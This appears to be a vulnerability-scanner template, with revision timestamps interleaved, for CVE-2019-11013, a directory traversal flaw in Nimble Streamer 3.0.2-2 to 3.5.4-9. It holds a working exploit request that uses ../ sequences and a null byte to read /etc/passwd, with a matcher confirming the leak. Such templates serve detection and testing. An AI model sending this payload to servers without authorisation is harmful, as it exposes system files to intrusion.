2021-09-05 03:10:02 +00:00
id : CVE-2019-11013
info :
name : Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
author : 0x_Akoko
2021-09-10 11:26:40 +00:00
severity : medium
2022-05-17 09:18:12 +00:00
description : Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
2021-09-06 11:26:14 +00:00
reference :
- https://www.exploit-db.com/exploits/47301
- https://nvd.nist.gov/vuln/detail/CVE-2019-11013
2022-05-17 09:18:12 +00:00
- https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/
- http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-11013
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,lfi,nimble
2021-09-05 03:10:02 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200